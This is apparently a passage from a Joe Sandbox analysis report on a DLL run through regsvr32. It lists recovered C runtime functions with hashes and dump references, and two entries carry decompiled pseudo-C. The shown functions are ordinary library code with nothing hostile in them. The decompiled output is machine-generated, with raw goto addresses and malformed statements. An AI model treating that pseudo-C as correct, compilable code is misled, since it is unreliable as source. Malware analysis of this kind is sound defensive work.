                                    Function 000007FEF9D32C9F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 48COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: ("Invalid error_mode", 0)$_set_error_mode$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\errmode.c
                                    • API String ID: 2123368286-2972513288
                                    • Opcode ID: 8fb5a3cdd681d6a82b02ff81c277c719a79eaaec91177dc4ca99e8a0364f32ec
                                    • Instruction ID: a668ed4e1bbba8445569e891f5cf80d88739aba3494b1a7bdc37a92eebe2cfe6
                                    • Opcode Fuzzy Hash: 8fb5a3cdd681d6a82b02ff81c277c719a79eaaec91177dc4ca99e8a0364f32ec
                                    • Instruction Fuzzy Hash: 9A211A31E1D242CAE7E08F28EC44B6E72E0F344395F605536E6CA866B4D77EE944CB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D32695 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: _vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c$string != NULL && sizeInBytes > 0
                                    • API String ID: 2123368286-367560414
                                    • Opcode ID: 9835c0e10505228e0bf6b58a8474be5f834255bb2e0cd334fa5f5b7dd6645e21
                                    • Instruction ID: 95dcae893ef448fe982beb095dca5536e461671d142ad8532ffb40fd25d94385
                                    • Opcode Fuzzy Hash: 9835c0e10505228e0bf6b58a8474be5f834255bb2e0cd334fa5f5b7dd6645e21
                                    • Instruction Fuzzy Hash: 1D114931E0C64A8AF7E08B14EC457BE62E0F750385F608425D2DD46AF5DBBEE4888B01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D375E9 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 40COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: _wcstombs_l_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c$pwcs != NULL
                                    • API String ID: 2123368286-2992382544
                                    • Opcode ID: 9cdd31bc13f045a84d1723aba15172f6d66e597d1102c0836733c4c00faf9839
                                    • Instruction ID: 1601facfcd706bab2d32f933ec1205f4baa2dc81ccca363939aa7dccefded7e9
                                    • Opcode Fuzzy Hash: 9cdd31bc13f045a84d1723aba15172f6d66e597d1102c0836733c4c00faf9839
                                    • Instruction Fuzzy Hash: FD112831A08A86D6E7F08B24EC547BE62D1F384395FA0862581DD826E5DF7ED184CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3AFB0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: (stream != NULL)$_fileno$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\fileno.c
                                    • API String ID: 2123368286-3532421942
                                    • Opcode ID: c9b4c7eaa6f702e756935e157fc704da053bc53339d856ee334f13e3a5237ddc
                                    • Instruction ID: 5e243132be0629da1aa3e0b85d41bf950597728ff9ff9f12ab22c17114f4bf60
                                    • Opcode Fuzzy Hash: c9b4c7eaa6f702e756935e157fc704da053bc53339d856ee334f13e3a5237ddc
                                    • Instruction Fuzzy Hash: DB115A71A2D6468AEB949B54E948B6E73E0F340344F605225F6D943AA8C77ED509CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D37E4E Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: (dst != NULL && sizeInBytes > 0) || (dst == NULL && sizeInBytes == 0)$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c
                                    • API String ID: 2123368286-152112980
                                    • Opcode ID: bee2d7726ac50f9e7da98411c921f1d389d1484d621cac995bcaec902168c7d6
                                    • Instruction ID: 316e0cb66aac120259ec5fe7cf49b7d80870e23a4d2a4d539908350f5dd74761
                                    • Opcode Fuzzy Hash: bee2d7726ac50f9e7da98411c921f1d389d1484d621cac995bcaec902168c7d6
                                    • Instruction Fuzzy Hash: C1112A31A0CA87C9F7A09B54EC047AE76E0F340345F704425D6CC466F4CBBEE8888B01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D234D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _unlock$CurrentThreadValue_calloc_dbg_calloc_dbg_impl
                                    • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dllcrt0.c
                                    • API String ID: 433497747-929597301
                                    • Opcode ID: e993b8295e4f15c9eb240b3e6c5194696fb031badc4e4f03d14c808df6e1b3aa
                                    • Instruction ID: 481e6957a9246cfaf4e6bd41be43a49f1ef1e62944320565ea2ccce3e108d99c
                                    • Opcode Fuzzy Hash: e993b8295e4f15c9eb240b3e6c5194696fb031badc4e4f03d14c808df6e1b3aa
                                    • Instruction Fuzzy Hash: F9012D21A2C64286E3D09B25EC4473EA2E0F784B50F719275A9DE426F5CF3FE4018601
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3206A Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: (count == 0) || (string != NULL)$_vsnprintf_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                    • API String ID: 2123368286-3131718208
                                    • Opcode ID: 43b2844285fd77a1982b218cfc07c90d3f3fad476d4107e0837d5d8b2ccbe159
                                    • Instruction ID: 25215b7a66bf5335accef34de15d40bd2ed0749c1f690011489e68f1b39c7366
                                    • Opcode Fuzzy Hash: 43b2844285fd77a1982b218cfc07c90d3f3fad476d4107e0837d5d8b2ccbe159
                                    • Instruction Fuzzy Hash: F3113571E086429AF7A09B28E9047BE62D0F344308F608525A7EC076F5DB7EE548CF41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D31FCB Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: (format != NULL)$_vsnprintf_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                    • API String ID: 2123368286-1927795013
                                    • Opcode ID: 98ed0b5fdb5fc60e70232fca9ee65f87cb4d2692f01eaf8ea89a3da70423e3bd
                                    • Instruction ID: 944cdc0bbf70bc89b755e38a530f77822666c2a95ff09ee036fe4101a55fb2d6
                                    • Opcode Fuzzy Hash: 98ed0b5fdb5fc60e70232fca9ee65f87cb4d2692f01eaf8ea89a3da70423e3bd
                                    • Instruction Fuzzy Hash: 62010831E0C646DAF7A09B68EC057AD66D0B380354FB04625A69C066F9DB7EE589CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D25A25 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: _msize_dbg$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$pUserData != NULL
                                    • API String ID: 2123368286-563024394
                                    • Opcode ID: 4f42008d2eeb6119988a971f0b8ebe92e3bb2dd5d0d6607e11ba140e367e8579
                                    • Instruction ID: a0eba8665c26eae2e6ed32b737e6c8ef722208237a38dcf7c055842964877d15
                                    • Opcode Fuzzy Hash: 4f42008d2eeb6119988a971f0b8ebe92e3bb2dd5d0d6607e11ba140e367e8579
                                    • Instruction Fuzzy Hash: 5B01483190860A86FBA09B14EC417AE62E0F351328FB14222D2DC126E4DB7FE545CB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D325F6 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: _vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c$format != NULL
                                    • API String ID: 2123368286-577066449
                                    • Opcode ID: e471ef19857bf677b9863c0521a2362ee6eb8c4f9ff1322e4db10fa111c1afe4
                                    • Instruction ID: 4a3f651cd4551bfcababacb72a39fd99133eb44e8e6a79d9543262d1bb372964
                                    • Opcode Fuzzy Hash: e471ef19857bf677b9863c0521a2362ee6eb8c4f9ff1322e4db10fa111c1afe4
                                    • Instruction Fuzzy Hash: 5D019630E0860ACAE7A09B10EC817AD22E0E794394FA08025A2CD066F8DB3EE6448B00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D27490 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: AddressHandleModuleProc
                                    • String ID: CorExitProcess$mscoree.dll
                                    • API String ID: 1646373207-1276376045
                                    • Opcode ID: 5b280635b15effc0f011d898b8b9467002935a92ac88a45419cb005d03af6660
                                    • Instruction ID: 8122274e17013f5b0610865d0345eaa92fe91d894f768ab51d4a4384d1174919
                                    • Opcode Fuzzy Hash: 5b280635b15effc0f011d898b8b9467002935a92ac88a45419cb005d03af6660
                                    • Instruction Fuzzy Hash: A5F0AC31918A4282D674DF18F94836DB7B0F384348F644125E6CE42678DF3ED559CA04
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D40C80 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 41%
                                    			E000007FE7FEF9D40C80(signed int __ecx, void* __eflags, void* __rax, void* __r8, signed int _a8) {
				signed long long _v16;
				long _v24;
				void* _t57;
				signed long long _t59;

				_t57 = __rax;
				_a8 = __ecx;
				E000007FE7FEF9D3F900(_a8);
				if (_t57 == 0xffffffff) goto 0xf9d40d05;
				if (_a8 != 1) goto 0xf9d40cb3;
				if (( *( *0xf9d4e560 + 0xb8) & 0x00000001) != 0) goto 0xf9d40ccc;
				if (_a8 != 2) goto 0xf9d40cef;
				_t59 =  *0xf9d4e560;
				if (( *(_t59 + 0x60) & 0x00000001) == 0) goto 0xf9d40cef;
				E000007FE7FEF9D3F900(1);
				_v16 = _t59;
				E000007FE7FEF9D3F900(2);
				if (_v16 == _t59) goto 0xf9d40d05;
				E000007FE7FEF9D3F900(_a8);
				if (CloseHandle(??) == 0) goto 0xf9d40d0f;
				_v24 = 0;
				goto 0xf9d40d19;
				_v24 = GetLastError();
				E000007FE7FEF9D3F7D0(_a8, _t59);
				 *((char*)( *((intOrPtr*)(0xf9d4e560 + _t59 * 8)) + 8 + (_a8 & 0x0000001f) * 0x58)) = 0;
				if (_v24 == 0) goto 0xf9d40d60;
				E000007FE7FEF9D2AA70(_v24,  *((intOrPtr*)(0xf9d4e560 + _t59 * 8)));
				goto 0xf9d40d62;
				return 0;
			}







                                    0x7fef9d40c80
                                    0x7fef9d40c80
                                    0x7fef9d40c8c
                                    0x7fef9d40c95
                                    0x7fef9d40c9c
                                    0x7fef9d40cb1
                                    0x7fef9d40cb8
                                    0x7fef9d40cba
                                    0x7fef9d40cca
                                    0x7fef9d40cd1
                                    0x7fef9d40cd6
                                    0x7fef9d40ce0
                                    0x7fef9d40ced
                                    0x7fef9d40cf3
                                    0x7fef9d40d03
                                    0x7fef9d40d05
                                    0x7fef9d40d0d
                                    0x7fef9d40d15
                                    0x7fef9d40d1d
                                    0x7fef9d40d44
                                    0x7fef9d40d4e
                                    0x7fef9d40d54
                                    0x7fef9d40d5e
                                    0x7fef9d40d66

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: CloseErrorHandleLast__doserrno_dosmaperr_free_osfhnd
                                    • String ID:
                                    • API String ID: 1551955814-0
                                    • Opcode ID: 539147ec8a9783b9fa5ff2985af3543efd94603151f732987cc3c022e13e7d90
                                    • Instruction ID: de0ed08be9decc95e7dd14c86c95eccfc4319969b2c7c8741dbc19f533f0ba9a
                                    • Opcode Fuzzy Hash: 539147ec8a9783b9fa5ff2985af3543efd94603151f732987cc3c022e13e7d90
                                    • Instruction Fuzzy Hash: 4A219F32A0C64686E7A49B28EC4133E72E1F781355F348235E6DD46AF9DB2EE845CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D21000 Relevance: 6.0, APIs: 4, Instructions: 47threadtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: FormatLocaleThread$DateTime
                                    • String ID:
                                    • API String ID: 3587784874-0
                                    • Opcode ID: 6ab24f3c8d7cd050487db91c395009c2fe45c414da0b1ba1062a45228bb8b770
                                    • Instruction ID: 0d03bf333fdb9b17262424d59d82d7c7719cce37cb4ba974854027563787c74d
                                    • Opcode Fuzzy Hash: 6ab24f3c8d7cd050487db91c395009c2fe45c414da0b1ba1062a45228bb8b770
                                    • Instruction Fuzzy Hash: 3311E33160878086E3608F68F94025EB7E0F748BA4F648724EF9D47BA8CB3ED1418700
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D2A5E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 198COMMONLIBRARYCODE
                                    Download Yara Rule
                                    C-Code - Quality: 23%
                                    			E000007FE7FEF9D2A5E0(long long __rcx, void* _a8) {
				signed int _v24;
				char _v42;
				void* _v48;
				signed int _v56;
				char _v312;
				signed char* _v328;
				char _v584;
				char _v840;
				char _v1352;
				char _v1384;
				char _v1392;
				intOrPtr _v1400;
				long long _v1408;
				long long _v1416;
				signed long long _t206;
				signed char* _t214;
				signed long long _t223;
				intOrPtr _t225;
				intOrPtr _t226;
				signed long long _t233;

				_t224 = __rcx;
				_a8 = __rcx;
				_t206 =  *0xf9d4b018; // 0x6ec74913a662
				_v24 = _t206 ^ _t233;
				if (GetCPInfo(??, ??) == 0) goto 0xf9d2a906;
				_v56 = 0;
				goto 0xf9d2a63c;
				_v56 = _v56 + 1;
				if (_v56 - 0x100 >= 0) goto 0xf9d2a661;
				 *((char*)(_t233 + _a8 + 0x470)) = _v56 & 0x000000ff;
				goto 0xf9d2a62c;
				_v312 = 0x20;
				_v328 =  &_v42;
				goto 0xf9d2a68f;
				_v328 =  &(_v328[2]);
				if (( *_v328 & 0x000000ff) == 0) goto 0xf9d2a6ea;
				_v56 =  *_v328 & 0x000000ff;
				goto 0xf9d2a6c2;
				_v56 = _v56 + 1;
				_t214 = _v328;
				if (_v56 - ( *(_t214 + 1) & 0x000000ff) > 0) goto 0xf9d2a6e8;
				 *((char*)(_t233 + _t214 + 0x470)) = 0x20;
				goto 0xf9d2a6b2;
				goto 0xf9d2a67b;
				_v1392 = 0;
				_v1400 =  *((intOrPtr*)(_a8 + 0xc));
				_v1408 =  *((intOrPtr*)(_a8 + 4));
				_v1416 =  &_v1352;
				r9d = 0x100;
				E000007FE7FEF9D2F4D0(1,  &_v1352, __rcx,  &_v312);
				_v1384 = 0;
				_v1392 =  *((intOrPtr*)(_a8 + 4));
				_v1400 = 0x100;
				_v1408 =  &_v840;
				_v1416 = 0x100;
				r8d = 0x100;
				E000007FE7FEF9D2EF00( *((intOrPtr*)(_a8 + 0xc)), _a8, _t224,  &_v312);
				_v1384 = 0;
				_v1392 =  *((intOrPtr*)(_a8 + 4));
				_v1400 = 0x100;
				_v1408 =  &_v584;
				_v1416 = 0x100;
				r8d = 0x200;
				_t223 = _a8;
				E000007FE7FEF9D2EF00( *((intOrPtr*)(_t223 + 0xc)), _t223, _t224,  &_v312);
				_v56 = 0;
				_v56 = _v56 + 1;
				if (_v56 - 0x100 >= 0) goto 0xf9d2a901;
				if (( *(_t233 + 0x60 + _t223 * 2) & 1) == 0) goto 0xf9d2a879;
				_t225 = _a8;
				 *((char*)(_a8 + _t225 + 0x1c)) =  *(_t225 + _t223 + 0x1c) & 0x000000ff | 0x00000010;
				 *((char*)(_a8 + _t225 + 0x11d)) =  *(_t233 + _t223 + 0x260) & 0x000000ff;
				goto 0xf9d2a8fc;
				if (( *(_t233 + 0x60 + _t223 * 2) & 2) == 0) goto 0xf9d2a8e5;
				_t226 = _a8;
				 *((char*)(_a8 + _t226 + 0x1c)) =  *(_t226 + _t223 + 0x1c) & 0x000000ff | 0x00000020;
				 *((char*)(_a8 + _t226 + 0x11d)) =  *(_t233 + _t223 + 0x360) & 0x000000ff;
				goto 0xf9d2a8fc;
				 *((char*)(_a8 + _t223 + 0x11d)) = 0;
				goto L1;
				goto 0xf9d2aa20;
				_v56 = 0;
				_v56 = _v56 + 1;
				_v56 = _v56 + 1;
				if (_v56 - 0x100 >= 0) goto 0xf9d2aa20;
				if (_v56 - 0x41 < 0) goto 0xf9d2a99c;
				if (_v56 - 0x5a > 0) goto 0xf9d2a99c;
				_v56 = _v56 + 1;
				__rcx = _a8;
				 *(__rcx + __rax + 0x1c) & 0x000000ff =  *(__rcx + __rax + 0x1c) & 0x000000ff | 0x00000010;
				_v56 = _v56 + 1;
				__rdx = _a8;
				 *((char*)(_a8 + __rcx + 0x1c)) = __al;
				_v56 = _v56 + 0x20;
				__ecx = _v56;
				__rdx = _a8;
				 *((char*)(_a8 + __rcx + 0x11d)) = __al;
				goto 0xf9d2aa1b;
				if (_v56 - 0x61 < 0) goto 0xf9d2aa04;
				if (_v56 - 0x7a > 0) goto 0xf9d2aa04;
				_v56 = _v56 + 1;
				__rcx = _a8;
				 *(__rcx + __rax + 0x1c) & 0x000000ff =  *(__rcx + __rax + 0x1c) & 0x000000ff | 0x00000020;
				_v56 = _v56 + 1;
				__rdx = _a8;
				 *((char*)(_a8 + __rcx + 0x1c)) = __al;
				_v56 = _v56 - 0x20;
				__ecx = _v56;
				__rdx = _a8;
				 *((char*)(__rdx + __rcx + 0x11d)) = __al;
				goto 0xf9d2aa1b;
				__eax = _v56;
				__rcx = _a8;
				 *((char*)(_a8 + __rax + 0x11d)) = 0;
				goto L2;
				__rcx = _v24;
				__rcx = _v24 ^ __rsp;
				return E000007FE7FEF9D23280(_v56, _v56, __edx, _v24 ^ __rsp, __rdx, __r8);
			}























                                    0x7fef9d2a5e0
                                    0x7fef9d2a5e0
                                    0x7fef9d2a5ec
                                    0x7fef9d2a5f6
                                    0x7fef9d2a619
                                    0x7fef9d2a61f
                                    0x7fef9d2a62a
                                    0x7fef9d2a635
                                    0x7fef9d2a647
                                    0x7fef9d2a658
                                    0x7fef9d2a65f
                                    0x7fef9d2a661
                                    0x7fef9d2a671
                                    0x7fef9d2a679
                                    0x7fef9d2a687
                                    0x7fef9d2a69c
                                    0x7fef9d2a6a9
                                    0x7fef9d2a6b0
                                    0x7fef9d2a6bb
                                    0x7fef9d2a6c2
                                    0x7fef9d2a6d5
                                    0x7fef9d2a6de
                                    0x7fef9d2a6e6
                                    0x7fef9d2a6e8
                                    0x7fef9d2a6ea
                                    0x7fef9d2a6fd
                                    0x7fef9d2a70c
                                    0x7fef9d2a715
                                    0x7fef9d2a71a
                                    0x7fef9d2a72f
                                    0x7fef9d2a734
                                    0x7fef9d2a747
                                    0x7fef9d2a74b
                                    0x7fef9d2a75b
                                    0x7fef9d2a760
                                    0x7fef9d2a770
                                    0x7fef9d2a783
                                    0x7fef9d2a788
                                    0x7fef9d2a79b
                                    0x7fef9d2a79f
                                    0x7fef9d2a7af
                                    0x7fef9d2a7b4
                                    0x7fef9d2a7c4
                                    0x7fef9d2a7ca
                                    0x7fef9d2a7d7
                                    0x7fef9d2a7dc
                                    0x7fef9d2a7f2
                                    0x7fef9d2a804
                                    0x7fef9d2a81b
                                    0x7fef9d2a828
                                    0x7fef9d2a84b
                                    0x7fef9d2a86d
                                    0x7fef9d2a874
